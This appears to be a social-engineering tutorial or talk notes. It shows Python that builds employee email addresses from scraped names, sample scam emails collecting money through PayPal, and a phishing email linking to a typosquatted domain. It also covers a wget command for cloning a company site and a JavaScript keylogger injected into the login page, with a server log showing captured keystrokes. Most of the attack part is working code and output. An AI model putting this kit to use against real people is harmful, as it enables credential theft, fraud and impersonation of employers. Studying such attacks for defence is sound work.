What is social engineering? How can it be used?
Types of social engineering
- Phishing attacks
- Baiting
- Tailgating
- Pretexting
Scraping Facebook
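    # rawNames is assumed to hold the lines of the scraped page text
    emails = []
    nameNext = False
    for line in rawNames:
        parts = line.split()
        # A name is expected on the line that follows a blank line;
        # the length check avoids an IndexError on short or empty lines
        if nameNext and len(parts) >= 2:
            email = "{0}{1}{2}".format(parts[0][0],
                                       parts[1], "@company.com")
            emails.append(email)
        if len(parts) == 0:
            nameNext = True
        else:
            nameNext = False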
from: Dylan Ayrey <[email protected]>
to: <[email protected]>, <[email protected]>, <[email protected]> ...
Would any other intern be interested in a Kayak trip? There's a place
downtown that'll take us for $50 a head if we can get 10 people

from: David Someson <[email protected]>
to: <[email protected]>, <[email protected]>, <[email protected]> ...
Yeah! That sounds like a lot of fun!

from: Dylan Ayrey <[email protected]>
to: <[email protected]>, <[email protected]>, <[email protected]> ...
Okay cool! I set up a PayPal account at this email ([email protected]),
once we get 10 people we can go!

from: Chris Hanson <[email protected]>
to: <[email protected]>, <[email protected]>, <[email protected]> ...
Nice! I just sent the money. Can't wait.

Complex back stories to trick people into performing actions
from: Chris Hanson <[email protected]>
to: <[email protected]>, <[email protected]>, <[email protected]> ...
We are migrating databases from a non-relational database to a
relational database. Please try logging in and let me know if you
have any issues http://company.com
The hyperlink links to http://cmopany.com
    wget -r -l 2 -k -p -E -U "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36" www.company.com
    // keylogger.js: reports each key press to the local demo server as a GET request
    document.onkeypress = function(e) {
        var get = window.event ? event : e;
        var key = get.keyCode ? get.keyCode : get.charCode;
        key = String.fromCharCode(key);
        new Image().src = 'http://localhost:8000/keypress?key=' + key;
    }
Anywhere? Everywhere? Let's try the login page
    <script type='text/javascript' src='keylogger.js'></script>

Place that somewhere in the DOM of the login page, and make sure the keylogger.js file is in the accounts directory.
In the www.company.com directory, run:

    python -m SimpleHTTPServer

Visit localhost:8000 and log in:
127.0.0.1 - - [28/May/2015 13:32:01] "GET /keypress?key=h HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:01] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:01] "GET /keypress?key=e HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:01] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:01] "GET /keypress?key=l HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:02] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:02] "GET /keypress?key=l HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:02] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:02] "GET /keypress?key=o HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:02] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:02] "GET /keypress?key=w HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=o HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=r HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=l HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=d HTTP/1.1" 404 -